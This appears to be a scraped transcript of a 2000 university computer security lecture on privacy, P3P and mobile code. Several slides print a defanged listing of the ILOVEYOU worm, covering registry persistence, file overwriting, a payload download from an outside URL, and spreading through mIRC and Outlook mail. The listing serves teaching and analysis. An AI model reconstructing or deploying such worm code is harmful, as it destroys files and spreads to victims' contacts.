Presentation is loading. Please wait.

Presentation is loading. Please wait.

Lecture 4, 20-771: Computer Security, Fall 2000 1 20-771: Computer Security Lecture 4: Active Content & Privacy 1 Robert Thibadeau School of Computer.

Published byJade Lyons Modified over 9 years ago

Similar presentations

Presentation on theme: "Lecture 4, 20-771: Computer Security, Fall 2000 1 20-771: Computer Security Lecture 4: Active Content & Privacy 1 Robert Thibadeau School of Computer."— Presentation transcript:

1

2 Lecture 4, 20-771: Computer Security, Fall 2000 1 20-771: Computer Security Lecture 4: Active Content & Privacy 1 Robert Thibadeau School of Computer Science Carnegie Mellon University Institute for eCommerce, Fall 2000

3 Lecture 4, 20-771: Computer Security, Fall 2000 2 Today’s lecture Privacy I Break (10 min) Active Content Quiz

4 Lecture 4, 20-771: Computer Security, Fall 2000 3 This Week Chapters 3,4,5 WS Homework Quiz Today

5 Lecture 4, 20-771: Computer Security, Fall 2000 4 X.509v3 Certificate -----BEGIN CERTIFICATE----- MIIDNjCCAp+gAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMAkGA1UEBhMCWFkx FTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUG A1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZmljYXRlIEF1dGhv cml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhvcNAQkBFg9jYUBz bmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMTgyMTUxWjCBpzEL MAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25h a2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBgNVBAsTDldlYnNl cnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR8wHQYJKoZIhvcN AQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB gQC554Ro+VH0dJONqljPBW+C72MDNGNy9eXnzejXrczsHs3Pc92Vaat6CpIEEGue yG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9ziYon8jWsbK2aE +L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImW+Zds8YEFiAwIDAQABo24wbDAbBgNV HREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGG+EIBDQQtFittb2Rfc3Ns IGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMBEGCWCGSAGG+EIB AQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nTkRDQlBdgCcnhy3 hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafLUMdARVV6BpIGMI 5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJmjSguYCRt91sU4K s0dfWsdItkw4uQ== -----END CERTIFICATE-----

6 Lecture 4, 20-771: Computer Security, Fall 2000 5 X.509v3 Opened! Certificate: Data: Version: 3 (0x2) Serial Number: 1 (0x1) Signature Algorithm: md5WithRSAEncryption Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Certificate Authority, CN=Snake Oil CA/Email=ca@snakeoil.dom Validity Not Before: Oct 21 18:21:51 1999 GMT Not After : Oct 20 18:21:51 2001 GMT Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Webserver Team, CN=www.snakeoil.dom/Email=www@snakeoil.dom Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit):

7 Lecture 4, 20-771: Computer Security, Fall 2000 6 509 Opened 2 KEY : 00:b9:e7:84:68:f9:51:f4:74:93:8d:aa:58:cf:05: 6f:82:ef:63:03:34:63:72:f5:e5:e7:cd:e8:d7:ad: cc:ec:1e:cd:cf:73:dd:95:69:ab:7a:0a:92:04:10: 6b:9e:c8:6d:bd:c5:a8:1b:d6:8e:c6:8f:62:91:82: 95:58:72:67:71:ea:d1:dd:d8:99:05:5b:90:5c:15: 57:d6:5c:be:36:3d:5e:2b:7f:dc:e2:62:89:fc:8d: 6b:1b:2b:66:84:f8:be:a1:0a:d7:1b:c5:d6:c7:38: 66:5d:48:85:99:27:07:3f:d5:5b:3b:d1:2f:fb:22: 65:be:65:db:3c:60:41:62:03 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Subject Alternative Name: email:www@snakeoil.dom Netscape Comment: mod_ssl generated custom server certificate Netscape Cert Type: SSL Server Signature Algorithm: md5WithRSAEncryption 7a:31:1b:18:19:35:d4:47:9d:ff:9d:39:11:0d:09:41:76:00: 9c:9e:1c:b7:84:4a:df:98:f3:65:fc:ea:f9:8d:63:a6:ba:e7: de:21:7a:82:bc:ce:9d:2b:b9:16:fc:a0:5b:a2:e8:b8:a5:f7: c8:29:45:5a:7c:b5:0c:74:04:55:57:a0:69:20:63:08:e4:b9: 95:14:ad:ec:83:0b:89:d3:5b:ff:f7:48:42:b7:89:13:5a:84: fc:60:76:c1:2e:d4:21:ec:fc:d6:80:9a:01:01:8e:cc:26:68: d2:82:e6:02:46:df:75:b1:4e:0a:b3:47:5f:5a:c7:48:b6:4c: 38:b9

8 Lecture 4, 20-771: Computer Security, Fall 2000 7 Privacy : Introduction Privacy does not have the honor of having an accepted technical meaning –PII : Personally Identifiable Information –Privacy as insuring against the misuse of information –Assuring that data is hidden Interesting Government Policy Documents –http://www.whitehouse.gov/WH/New/Commerce/read.htmlhttp://www.whitehouse.gov/WH/New/Commerce/read.html –http://www.whitehouse.gov/WH/New/html/20000501_4.ht mlhttp://www.whitehouse.gov/WH/New/html/20000501_4.ht ml Sky is falling syndrome: –http://www.privacylaw.net/..among many othershttp://www.privacylaw.net/

9 Lecture 4, 20-771: Computer Security, Fall 2000 8 The Simple Cases Keep it completely secret so privacy is assured. (Crytophilia) Make it completely public so privacy is not a problem. (Jeffersonism) Personally Identifiable Information, PII, (your name, address, and credit card number) is all that needs to be protected. (CreditCarditis) Not good enough. Need to tell some things to some people but don’t want those things misused.

10 Lecture 4, 20-771: Computer Security, Fall 2000 9 Sky is falling Syndrome Considering history, FBI e-mail snooping raises red flag Five biggest threats to online privacy Privacy Group Wants Speedier Carnivore Disclosure FBI To Release E-mail Documents Verizon Site Exposed Customer Data Nosy Bosses Face Limits on E-Mail Spying-- Workers Gain New Freedoms

11 Lecture 4, 20-771: Computer Security, Fall 2000 10 Sky is Falling Those guys are bad guys that are taking advantage of anything I disclose and anything they can find out. Doubleclick and cookies –Cookie is employed to keep track of sites you visit. –Still, ongoing. Very hard to defeat as a practical matter. –Very hard not to visit a place. –Bypasses proxy services.

12 Lecture 4, 20-771: Computer Security, Fall 2000 11 Silent Information Thieves! Access Log - My NeXT Machine in my office (BSD 4.2) (/private/adm/network) May 9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173 May 9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net): lookup failure May 9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173 May 10 06:32:51 nageela ftpd[2509]: connect from vc3-49d.dsl.indra.com May 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.com May 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.com May 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.ca May 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4 May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4 May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4 May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4 May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.com May 21 03:06:54 nageela telnetd[8120]: connect from hermes.globalwebdesign.com May 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.com May 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.edu May 24 01:55:35 nageela ftpd[9277]: connect from 208.135.135.76 May 28 05:02:38 nageela ftpd[11282]: connect from cx884963-a.chnd1.az.home.com May 29 02:16:38 nageela ftpd[11749]: connect from 194.204.246.130 May 30 01:48:50 nageela ftpd[12032]: connect from 140.123.224.37 May 30 02:54:36 nageela ftpd[12051]: connect from u5611a.dorm.ccu.edu.tw Jun 3 14:09:47 nageela ftpd[14281]: connect from cr908045-a.ym1.on.wave.home.com Jun 3 20:30:04 nageela ftpd[14425]: connect from 193.40.7.69 Jun 3 20:31:06 nageela ftpd[14426]: connect from 193.40.7.69 Jun 7 13:09:40 nageela ftpd[15728]: connect from garfield.EBICom.Net Jun 7 13:09:42 nageela ftpd[15729]: connect from garfield.EBICom.Net Jun 8 07:44:10 nageela ftpd[16109]: connect from dt010n13.san.rr.com Jun 27 16:58:29 nageela ftpd[1482]: connect from 204.116.83.2 Jun 30 10:14:05 nageela telnetd[2846]: connect from dialup-wdc24655.mpx.com.au Jun 30 10:14:12 nageela telnetd[2847]: connect from dialup-wdc24655.mpx.com.au Jul 6 10:55:49 nageela telnetd[5356]: connect from UX6.SP.CS.CMU.EDU Jul 9 20:56:41 nageela telnetd[6925]: connect from mozart.wisdom.weizmann.ac.il Jul 9 20:56:41 nageela ftpd[6926]: connect from mozart.wisdom.weizmann.ac.il Jul 9 20:56:41 nageela telnetd[6927]: connect from mozart.wisdom.weizmann.ac.il Jul 10 08:50:42 nageela telnetd[7062]: connect from 200.230.62.36 Jul 10 08:50:43 nageela ftpd[7065]: connect from 200.230.62.36 Jul 10 08:50:43 nageela telnetd[7066]: connect from 200.230.62.36 Jul 13 00:56:01 nageela telnetd[7982]: connect from c64886-b.lakwod3.co.home.com Jul 25 05:47:31 nageela ftpd[12972]: connect from 208.240.246.6 Jul 25 07:40:20 nageela ftpd[12990]: connect from moonbeam.connriver.net Jul 25 07:42:54 nageela ftpd[12991]: connect from moonbeam.connriver.net Jul 25 13:45:48 nageela ftpd[13061]: connect from aigw3.aici.com Jul 25 13:45:48 nageela telnetd[13062]: connect from aigw3.aici.com Jul 31 09:02:25 nageela ftpd[1146]: connect from 210.223.79.200 Jul 31 09:02:26 nageela ftpd[1147]: connect from 210.223.79.200 Aug 1 02:07:58 nageela ftpd[1364]: connect from bambina.idnet.de Aug 1 02:17:18 nageela ftpd[1367]: connect from bambina.idnet.de Aug 2 05:56:47 nageela telnetd[1713]: connect from c64886-b.lakwod3.co.home.com Aug 5 23:05:53 nageela ftpd[3643]: connect from www.econ.cau.ac.kr Aug 9 19:56:48 nageela ftpd[5362]: connect from 216.47.244.7 Aug 9 20:19:28 nageela ftpd[5368]: connect from 216.47.244.7 Aug 16 02:31:45 nageela ftpd[8304]: connect from i44pc20.info.uni-karlsruhe.de Aug 16 02:31:45 nageela ftpd[8305]: connect from i44pc20.info.uni-karlsruhe.de Aug 20 22:40:53 nageela telnetd[11114]: connect from kumasi.frontec-uk.com Aug 22 22:51:33 nageela ftpd[11716]: connect from cathay-usa.com Aug 22 22:51:34 nageela ftpd[11717]: connect from cathay-usa.com Aug 23 22:35:31 nageela telnetd[12307]: connect from 209.135.0.220 Aug 23 22:36:34 nageela telnetd[12308]: connect from 209.135.0.220 Aug 28 21:20:58 nageela ftpd[14980]: connect from dl015.mii.zaz.com.br Sep 2 18:30:44 nageela ftpd[18062]: connect from cx388792-a.msnv1.occa.home.com Sep 2 18:39:43 nageela ftpd[18063]: connect from cx388792-a.msnv1.occa.home.com Sep 7 21:26:17 nageela telnetd[20629]: connect from 198.189.134.199 Sep 8 15:02:48 nageela ftpd[21173]: connect from rht.vi.ri.cmu.edu Transfer interrupted! face="Arial">Sep 10 16:12:43 nageela ftpd[22555]: connect from rht.vi.ri.cmu.edu Sep 10 16:21:19 nageela ftpd[22566]: connect from nageela.vi.ri.cmu.edu Sep 10 16:30:14 nageela ftpd[22607]: connect from nageela.vi.ri.cmu.edu Sep 10 16:31:47 nageela ftpd[22618]: connect from nageela.vi.ri.cmu.edu Sep 10 16:39:09 nageela ftpd[22639]: connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:39:27 nageela telnetd[22640]: connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:41:01 nageela ftpd[22648]: connect from nageela.vi.ri.cmu.edu Sep 10 16:42:20 nageela ftpd[22650]: refused connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:42:28 nageela telnetd[22651]: refused connect from DOLLAR.ECOM.CMU.EDU Sep 10 17:11:37 nageela ftpd[22695]: connect from rht.vi.ri.cmu.edu Sep 13 11:07:01 nageela telnetd[23665]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com Sep 13 11:07:01 nageela telnetd[23665]: refused connect from 192.76.184.141 Sep 13 11:07:20 nageela ftpd[23666]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com Sep 13 11:07:20 nageela ftpd[23666]: refused connect from 192.76.184.141 Sep 14 09:10:08 nageela ftpd[24182]: connect from rht.vi.ri.cmu.edu Sep 14 14:02:22 nageela ftpd[24400]: connect from rht.vi.ri.cmu.edu Sep 15 02:04:05 nageela ftpd[24716]: refused connect from ATBRILL.REM.CMU.EDU Sep 15 04:36:43 nageela ftpd[24757]: connect from jelly.visus.com

13 Lecture 4, 20-771: Computer Security, Fall 2000 12 An Unsolvable Problem?  Privacy is clearly out of control on the Internet  There is theft of information all over the place, all the time. The controls are not disclosed and would be ridiculous if examined carefully.  Privacy Policies are ridiculous since they are one-way ultimatums trying to be “reasonable”  Restricting privacy to considering your name and address is ridiculous because there are lots of ways to identify you.  Personally Identifiable Information is ridiculous because that cannot be specified perfectly.

14 Lecture 4, 20-771: Computer Security, Fall 2000 13 Authorization Limit actions to those that are authorized to take those actions. –This seems OK since they can be held responsible for this. Limit use of information to those that are authorized to use it. –Protects privacy if there is an “understanding” not to misuse. –Do you believe this?

15 Lecture 4, 20-771: Computer Security, Fall 2000 14 Privacy It is not an information problem –PII protection is ill-defined It is a problem with the use of information –Information misuse is the problem –Information misuse is ill-defined It makes more sense to address the ill- defined, but vastly more pervasive and appropriate, problem of information misuse than the ill-defined problem of personally identifiable information.

16 Lecture 4, 20-771: Computer Security, Fall 2000 15 Privacy Modelled after the Non- Disclosure Agreement What is going to be disclosed. For what purpose. Both parties agree to what information is disclosed Both parties agree to what use this information is put

17 Lecture 4, 20-771: Computer Security, Fall 2000 16 Privacy Requires Legally binding default agreements –Like Copyright or other Law (You can’t read somebody else’s mail). Agreements on what information is disclosed and what use the information is put. –Agreement is two sided. –It is not reasonable to assume that a one-sided agreement preserves privacy.

18 Lecture 4, 20-771: Computer Security, Fall 2000 17 www.w3.org/p3p www.w3.org/p3p Platform for Privacy Preferences The legal entity making the representation. The site provides access to various kinds of information. Data practices applied to data. Types of data that a site collects Intended uses of the data. Purpose of data collection or purpose of uses of data. Retention policy on data. Dispute Resolution procedures (e.g., third party, customer support). Remedy (e.g., cash payment) Explanation about why the suggested practice may be valuable in a particular instance even if the user would not normally allow the practice.

19 Lecture 4, 20-771: Computer Security, Fall 2000 18 Nature of P3P “Agreement” Client goes to Server Server issues ultimatum about Privacy Policy Client can either accept or leave. Methods exist for notifying User that a Privacy Policy is in violation of his Privacy Preferences, so as to allow User to change his mind. –APPEL : Rules that say, ACCEPT, REJECT, INFORM, WARN (user).

20 Lecture 4, 20-771: Computer Security, Fall 2000 19 PSP Agreement is NOT an Agreement It can be repudiated (I didn’t see that, my browser wasn’t working) There is no confirmation among the two parties of an agreement. The server must simply assume the user has agreed. User has no opportunity to pose a different privacy policy to server. User is not bound by any agreement not to disclose or misuse. Alternative means of passing information not covered (e.g., email?) – no explicit scope.

21 Lecture 4, 20-771: Computer Security, Fall 2000 20 Two Sides Buyer wants things without exposing any information he discloses to any use other than what they MUST have to give him the things he wants. (Cryptophilia) Seller wants to know as much about Buyer as possible because this gives him control over Buyers and therefore revenue. He can also sell this information (e.g., to advertisers). He wants unrestricted use of this information. BUT, Buyers now collect information on Sellers and misuse that (The Sky is Falling.) An Agreement is bilateral. The Internet can make possible agreements public and thereby expose both Sellers and Buyers to violations.

22 Lecture 4, 20-771: Computer Security, Fall 2000 21 More Rational Privacy Scenario TRUSTe violates privacy agreement and uses cookies to track personally identifiable information. Reporter violates privacy agreement and reports publicly on TRUSTe violation without first contacting the TRUSTe webmaster. Now we are talking trust!

23 Lecture 4, 20-771: Computer Security, Fall 2000 22 Next: Active Content Think about the world if Active Content had privacy agreements around it.

24 Lecture 4, 20-771: Computer Security, Fall 2000 23 Break!

25 Lecture 4, 20-771: Computer Security, Fall 2000 24 Active Content Also called “Mobile Code” Web Browsers can download and execute software automatically without warning. Software may damage user’s system or violate privacy. Administrator: This can tunnel through firewall protections. Case: U.S. Government came close, within two weeks, to an executive order that shut down all “mobile code” in the government. Failed: This would “dumb down” Federal employees and make the Government Stupid.

26 Lecture 4, 20-771: Computer Security, Fall 2000 25 Threats from Mobile Code Purposefully malicious –Moldovan Connection »Sexygirls.com and Erotic2000.com »Downloaded and ran viewer, program hung up phone and made long distance call to Moldovan, $2 per minute. »User taken to site stayed around without knowing charge. –“I Love You” Worm : probable accidental escape. Big programs have bugs –Other people will exploit those bugs

27 Lecture 4, 20-771: Computer Security, Fall 2000 26 Traditional Threats Trojan Horses : Very Serious. Often used for spying. (e.g., change the login program to create a back door). Virus : Code that replicates itself and inserts into an executable program or file. Macro viruses : Viruses written in the macro language of a word processor, or other trusted program. Becomes infectious on other documents. Rabbits : Programs that make many copies of themselves. Standalone. Denial of Service. Worms : Similar but spread across network.

28 Lecture 4, 20-771: Computer Security, Fall 2000 27 Many Many Threats I Love You –Opening email that says “I Love You” from a person you know: Trojan Horse –Reads your address book : Privacy Violation –Deletes image files : Havoc –Across Network : Worm Demonstrated –Microsoft Outlook could execute seriously destructive and intrusive active content without control of user.

29 Lecture 4, 20-771: Computer Security, Fall 2000 28 I Love You Code (virus has been killed) had name ‘vxryfunny.vbs’ rxm barok -lovxlxttxr(vbx) <i hatx go to school> rxmby: spydxr / ispydxr@mail.com / @GRAMMxRSoft Group / Manila,Philippinxs dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,d ow Sxt fso = CrxatxObj("Scripting.FilxSystxmObj") sxt filx = fso.OpxnTxxt(WScript.ScriptFullnamx,1) vbscopy=filx.RxadAll

30 Lecture 4, 20-771: Computer Security, Fall 2000 29 I Love You Code 2 main() sxt wscr=CrxatxObj("WScript.Shxll") rr=wscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Window s Scripting Host\Sxttings\Timxout") wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout",0,"RxG_DWORD" Sxt dirwin = fso.GxtSpxcialFoldxr(0) Sxt dirsystxm = fso.GxtSpxcialFoldxr(1) Sxt dirtxmp = fso.GxtSpxcialFoldxr(2) Sxt c = fso.GxtFilx(WScript.ScriptFullNamx) c.Copy(dirsystxm&"\MSKxrnxl32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystxm&"\Vxry Funny.vbs") rxgruns() html() sprxadtoxmail() listadriv()

31 Lecture 4, 20-771: Computer Security, Fall 2000 30 I Love You Code 3 : rxgruns() sub rxgruns() rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\R un\MSKxrnxl32",dirsystxm&"\MSKxrnxl32.vbs" rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\R unSxrvicxs\Win32DLL",dirwin&"\Win32DLL.vbs" Dn=rxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Download Dirory") rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","http://www.skyinxt.nxt/~young1s/HJKhjnwxrhjkxcvytwxrtnMT FwxtrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.xxx" rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\R un\WIN-BUGSFIX",downrxad&"\WIN-BUGSFIX.xxx" rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","about:blank" xnd sub

32 Lecture 4, 20-771: Computer Security, Fall 2000 31 I Love You Code 4 Listing the Drives on Your Machine (there were several of these utility-type spies) sub listadriv Dim d,dc,s Sxt dc = fso.Drivxs For xach d in dc If d.DrivxTypx = 2 or d.DrivxTypx=3 Thxn foldxrlist(d.path&"\") xnd if Nxxt listadriv = s xnd sub

33 Lecture 4, 20-771: Computer Security, Fall 2000 32 I Love You Code 5 re-writing jpg files sub inffilxs(foldxrspxc) sxt f = fso.GxtFoldxr(foldxrspxc) sxt fc = f.Filxs for xach f1 in fc xxt=fso.GxtxxtxnsionNamx(f1.path) if (xxt="vbs") or (xxt="vbx") thxn sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux) ap.writx vbscopy ap.closx xlsxif(xxt="jpg") or (xxt="jpxg") thxn sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux) ap.writx vbscopy ap.closx (did same for mp3 files and others)

34 Lecture 4, 20-771: Computer Security, Fall 2000 33 if (xq<>foldxrspxc) thxn if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxn sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini") scriptini.WritxLinx "[script]" scriptini.WritxLinx ";mIRC Script" scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will" scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks" scriptini.WritxLinx ";" scriptini.WritxLinx ";Khalxd Mardam-Bxy" scriptini.WritxLinx ";http://www.mirc.com" scriptini.WritxLinx ";" scriptini.WritxLinx "n0=on 1:JOIN:#:{" scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }" scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM" scriptini.WritxLinx "n3=}" scriptini.closx xq=foldxrspxc nxxt xnd sub I Love You Code 6 :.ini

35 Lecture 4, 20-771: Computer Security, Fall 2000 34 if (xq<>foldxrspxc) thxn if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxn sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini") scriptini.WritxLinx "[script]" scriptini.WritxLinx ";mIRC Script" scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will" scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks" scriptini.WritxLinx ";" scriptini.WritxLinx ";Khalxd Mardam-Bxy" scriptini.WritxLinx ";http://www.mirc.com" scriptini.WritxLinx ";" scriptini.WritxLinx "n0=on 1:JOIN:#:{" scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }" scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM" scriptini.WritxLinx "n3=}" scriptini.closx xq=foldxrspxc nxxt xnd sub I Love You Code 7 :.ini file

36 Lecture 4, 20-771: Computer Security, Fall 2000 35 sub sprxadtoxmail() sxt rxgxdit=CrxatxObj("WScript.Shxll") sxt out=WScript.CrxatxObj("Outlook.Application") sxt mapi=out.GxtNamxSpacx("MAPI") for ctrlists=1 to mapi.AddrxssLists.Count sxt a=mapi.AddrxssLists(ctrlists) rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WA B\"&a) if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxn for ctrxntrixs=1 to a.Addrxssxntrixs.Count malxad=a.Addrxssxntrixs(x) rxgad="" rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\W AB\"&malxad) if (rxgad="") thxn sxt malx=out.CrxatxItxm(0) malx.Rxcipixnts.Add(malxad) malx.Subj = "fwd: Jokx" malx.Body = vbcrlf&"" malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs") malx.Sxnd Sxt out=Nothing Sxt mapi=Nothing xnd sub I Love You Code 8 : spread mail

37 Lecture 4, 20-771: Computer Security, Fall 2000 36 Silent Attacks I should be obvious it would not be hard to create a silent worm that sends mail on file systems, files, and address lists (and also all your mail on your local machine). We can do this with your web browser too …

38 Lecture 4, 20-771: Computer Security, Fall 2000 37 Virus Checkers Pattern match in secret ways to find viral “fingerprints” Use a technique called “finite state automata” to create very fast search over your files. If virus is not known already, it will do damage. Finding silent viruses may be hard.

39 Lecture 4, 20-771: Computer Security, Fall 2000 38 Authenticode System Windows 2000 Running code requires a X.509v3 Certificate with an approved CA Personal Publishers (ID with Credit Bureau) Commercial Publishers (Articles of Incorporation) Sign a pledge: “reasonable care consistent with prevailing industry standards to keep code free from viruses, malicious code, and other dta that may damage, misappropriate, or otherwise interfere with a third party’s operations.” Remedy: Revoke your Certificate (HA!)

40 Lecture 4, 20-771: Computer Security, Fall 2000 39 Steps you can Take Don’t run as administrator/root Use Virus Checkers (but watch those companies!!!) Backup Often Verify the integrity and authenticity of software. –A very good idea is to not accept active code without a certificate that guarantees the author can be found! –Same principle as “mutually assured destruction” or “keep the pilot on the plane!” He won’t hurt you if you can hurt him.

41 Lecture 4, 20-771: Computer Security, Fall 2000 40 Finally, Even if Adobe is the authentic code writer/distributor, get them to agree to your privacy!

Download ppt "Lecture 4, 20-771: Computer Security, Fall 2000 1 20-771: Computer Security Lecture 4: Active Content & Privacy 1 Robert Thibadeau School of Computer."

Similar presentations

Privacy & Other Issues. Acceptable Use Policies When you sign up for an account at school or from an Internet Service Provider, you agree to their rules.

Privacy & Other Issues. Acceptable Use Policies When you sign up for an account at school or from an Internet Service Provider, you agree to their rules.
By: Mr Hashem Alaidaros MIS 326 Lecture 6 Title: E-Business Security.

By: Mr Hashem Alaidaros MIS 326 Lecture 6 Title: E-Business Security.
Viruses,Hacking and Backups By Grace Mackay 8K Viruses Hacking and Hackers Backups.

Viruses,Hacking and Backups By Grace Mackay 8K Viruses Hacking and Hackers Backups.
Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.

Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.
Web Design & Development: Security By Trevor Adams.

Web Design & Development: Security By Trevor Adams.
3 Section C: Installing Software and Upgrades  Web Apps  Mobile Apps  Local Applications  Portable Software  Software Upgrades and Updates  Uninstalling.

3 Section C: Installing Software and Upgrades  Web Apps  Mobile Apps  Local Applications  Portable Software  Software Upgrades and Updates  Uninstalling.
Security, Privacy, and Ethics Online Computer Crimes.

Security, Privacy, and Ethics Online Computer Crimes.
Lecture 2 Page 1 CS 236, Spring 2008 Security Principles and Policies CS 236 On-Line MS Program Networks and Systems Security Peter Reiher Spring, 2008.

Lecture 2 Page 1 CS 236, Spring 2008 Security Principles and Policies CS 236 On-Line MS Program Networks and Systems Security Peter Reiher Spring, 2008.
Web Security A how to guide on Keeping your Website Safe. By: Robert Black.

Web Security A how to guide on Keeping your Website Safe. By: Robert Black.
Privacy & Security By Martin Perez. Introduction  Information system - People : meaning use, the people who use computers. - Procedures : Guidelines.

Privacy & Security By Martin Perez. Introduction  Information system - People : meaning use, the people who use computers. - Procedures : Guidelines.
CSE 4482, 2009 Session 21 Personal Information Protection and Electronic Documents Act Payment Card Industry standard Web Trust Sys Trust.

CSE 4482, 2009 Session 21 Personal Information Protection and Electronic Documents Act Payment Card Industry standard Web Trust Sys Trust.
S EC (4.5): S ECURITY 1. F ORMS OF ATTACK There are numerous way that a computer system and its contents can be attacked via network connections. Many.

S EC (4.5): S ECURITY 1. F ORMS OF ATTACK There are numerous way that a computer system and its contents can be attacked via network connections. Many.
Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.

Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.
Copyright © 1995-2009 Clifford Neuman - UNIVERSITY OF SOUTHERN CALIFORNIA - INFORMATION SCIENCES INSTITUTE USC CSci530 Computer Security Systems Lecture.

Copyright © Clifford Neuman - UNIVERSITY OF SOUTHERN CALIFORNIA - INFORMATION SCIENCES INSTITUTE USC CSci530 Computer Security Systems Lecture.
Alter – Information Systems 4th ed. © 2002 Prentice Hall 1 E-Business Security.

Alter – Information Systems 4th ed. © 2002 Prentice Hall 1 E-Business Security.
Human-Computer Interface Course 2. Content The use of IT in everyday life Electronic Commerce Security Computer Viruses Copyright and the Law File Systems.

Human-Computer Interface Course 2. Content The use of IT in everyday life Electronic Commerce Security Computer Viruses Copyright and the Law File Systems.
Unit 2 - Hardware Computer Security.

Unit 2 - Hardware Computer Security.
Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)

Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)
Lecture 5, 20-771: Computer Security, Fall 2002 1 20-771: Computer Security Lecture 4: ATTACK WEEK Robert Thibadeau School of Computer Science Carnegie.

Lecture 5, : Computer Security, Fall : Computer Security Lecture 4: ATTACK WEEK Robert Thibadeau School of Computer Science Carnegie.
Tutorial Chapter 5. 2 Question 1: What are some information technology tools that can affect privacy? How are these tools used to commit computer crimes?

Tutorial Chapter 5. 2 Question 1: What are some information technology tools that can affect privacy? How are these tools used to commit computer crimes?

Similar presentations

Ads by Google